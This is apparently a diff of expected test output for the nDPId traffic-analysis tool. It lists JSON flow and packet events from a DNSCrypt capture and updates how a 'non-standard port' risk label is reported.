 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":343,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318038,"flow_last_seen":946739318038,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739318038,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":52040,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":1,"flow_last_seen":946739318038,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739318038,"pkt":"REREREREZmZmZmZmCABFAAIc+3VAAL0Rif4KAAABl1DeT8tIAbsCCDh2XDABAAABAAAAAAABATINZG5zY3J5cHQtY2VydAdvcGVubmljBGkycGQDeHl6AAAQAAEAAAAAAAAAAAABwwAMAb8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00683{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":343,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318038,"flow_last_seen":946739318038,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739318038,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":52040,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":343,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318038,"flow_last_seen":946739318038,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739318038,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":52040,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":344,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318038,"flow_last_seen":946739318038,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739318038,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":57636,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":1,"flow_last_seen":946739318038,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739318038,"pkt":"REREREREZmZmZmZmCABFAAXc+3YgAL0Rpj0KAAABl1DeT+EkAbsGBHZpXDEBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAdvcGVubmljBGkycGQDeHl6AAAQAAEAAAAAAAAAAAAFvwAMBbsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00687{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":344,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318038,"flow_last_seen":946739318038,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739318038,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":57636,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00796{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":344,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318038,"flow_last_seen":946739318038,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739318038,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":57636,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":345,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739318038,"pkt":"REREREREZmZmZmZmCABFAABQ+3YAub0RyxAKAAABl1DeTwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":345,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":346,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318038,"flow_last_seen":946739318038,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739318038,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":38511,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":346,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":1,"flow_last_seen":946739318038,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739318038,"pkt":"REREREREZmZmZmZmCABFAAIc+3dAAL0RifwKAAABl1DeT5ZvAbsCCDh2XC4BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAdvcGVubmljBGkycGQDeHl6AAAQAAEAAAAAAAAAAAABwwAMAb8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00683{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":346,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318038,"flow_last_seen":946739318038,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739318038,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":38511,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":346,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318038,"flow_last_seen":946739318038,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739318038,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":38511,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00708{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":139,"flow_packet_id":2,"flow_last_seen":946739318059,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":229,"pkt_l4_len":195,"ts_msec":946739318059,"pkt":"ZmZmZmZmRERERERECABFAADX+4ZAADQRFDOXUN5PCgAAAQG70nQAw+UcXDKBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAdvcGVubmljBGkycGQDeHl6AAAQAAHADAAQAAEAAHCAAH18RE5TQwACAADbIkde1\/iXw9F8aP3hFzW\/UlCbjrsaMoYt8+MW53XVHmJZ40u2KJ1Y5p9+bOkgm9KOg6J\/Jk5OIIo5rrGKNcsPhxVktS2XlAVyckcTA1HXSkhBDvC7R+LCFU83mg2ymgqHFWS1LZeUBQAAAAFfU5R+X1Tl\/g=="}
 00708{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":348,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":140,"flow_packet_id":2,"flow_last_seen":946739318059,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":229,"pkt_l4_len":195,"ts_msec":946739318059,"pkt":"ZmZmZmZmRERERERECABFAADX+4dAADQRFDKXUN5PCgAAAQG7sbkAwwXbXC+BgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAdvcGVubmljBGkycGQDeHl6AAAQAAHADAAQAAEAAHCAAH18RE5TQwACAADbIkde1\/iXw9F8aP3hFzW\/UlCbjrsaMoYt8+MW53XVHmJZ40u2KJ1Y5p9+bOkgm9KOg6J\/Jk5OIIo5rrGKNcsPhxVktS2XlAVyckcTA1HXSkhBDvC7R+LCFU83mg2ymgqHFWS1LZeUBQAAAAFfU5R+X1Tl\/g=="}
 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":349,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318061,"flow_last_seen":946739318061,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739318061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":59011,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":349,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":145,"flow_packet_id":1,"flow_last_seen":946739318061,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739318061,"pkt":"REREREREZmZmZmZmCABFAAIcXchAAL0RQhgKAAABjgTNL+aDAbsCCB4KqlwBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczQCY2EFbHVnZ3MCY28AABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00682{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":349,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318061,"flow_last_seen":946739318061,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739318061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":59011,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":349,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318061,"flow_last_seen":946739318061,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739318061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":59011,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":350,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318061,"flow_last_seen":946739318061,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739318061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":50387,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":350,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":1,"flow_last_seen":946739318061,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739318061,"pkt":"REREREREZmZmZmZmCABFAAXcXckgAL0RXlcKAAABjgTNL8TTAbsGBCE2qlkBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczQCY2EFbHVnZ3MCY28AABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00686{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":350,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318061,"flow_last_seen":946739318061,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739318061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":50387,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":350,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318061,"flow_last_seen":946739318061,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739318061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":50387,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":351,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318061,"flow_last_seen":946739318061,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739318061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":40138,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
